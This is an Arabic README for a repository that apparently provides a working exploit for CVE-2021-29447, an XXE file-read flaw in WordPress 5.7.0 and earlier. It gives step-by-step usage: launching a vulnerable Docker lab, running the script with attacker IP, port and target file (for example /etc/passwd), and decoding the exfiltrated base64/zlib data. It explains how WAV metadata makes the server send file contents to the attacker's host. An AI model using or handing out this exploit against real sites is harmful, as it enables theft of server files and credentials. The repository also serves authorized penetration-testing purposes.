
يحتوي هذا المستودع على استغلال لـ CVE-2021-29447، وهي ثغرة XXE (XML External Entity) موجودة في WordPress 5.7.0 والإصدارات الأقدم. توجد الثغرة في مكتبة الوسائط التي تعالج ملفات WAV، مما يسمح للمهاجم بقراءة ملفات عشوائية من الخادم.
| الملف | الوصف |
|---|---|
CVE-2021-29447.sh | سكربت الاستغلال الذي يولّد حمولة WAV وملف DTD الخبيث |
decode.php | سكربت PHP لفك ترميز البيانات المسرّبة (base64 + zlib) |
docker-compose.yml | بيئة دوكر مع ووردبريس معرّض للثغرة للاختبارات |
docker-compose up -d
chmod +x CVE-2021-29447.sh
./CVE-2021-29447.sh -l <LHOST> -p <LPORT> -f <archivo_objetivo>
المعلمات:
-l عنوان IP للمهاجم (LHOST)-p منفذ المهاجم (LPORT)-f مسار الملف المراد قراءته على الخادم-h عرض المساعدةمثال:
./CVE-2021-29447.sh -l 192.168.1.100 -p 4444 -f /etc/passwd
البيانات المسرّبة ستكون مشفّرة بـ base64 ومضغوطة بـ zlib. لفك ترميزها:
php decode.php
يعمل الاستغلال عن طريق إدراج كيان خارجي XXE في البيانات الوصفية لملف WAV. عندما يعالج ووردبريس الملف، يقوم محلل XML بحلّ الكيان الخارجي، مما يتسبب في إرسال الخادم طلب HTTP إلى خادم المهاجم مع محتوى الملف مرمّزًا في عنوان URL.
هذا الكود مخصص للأغراض التعليمية واختبارات الاختراق المصرّح بها فقط. لا تستخدمه على أنظمة بدون إذن صريح.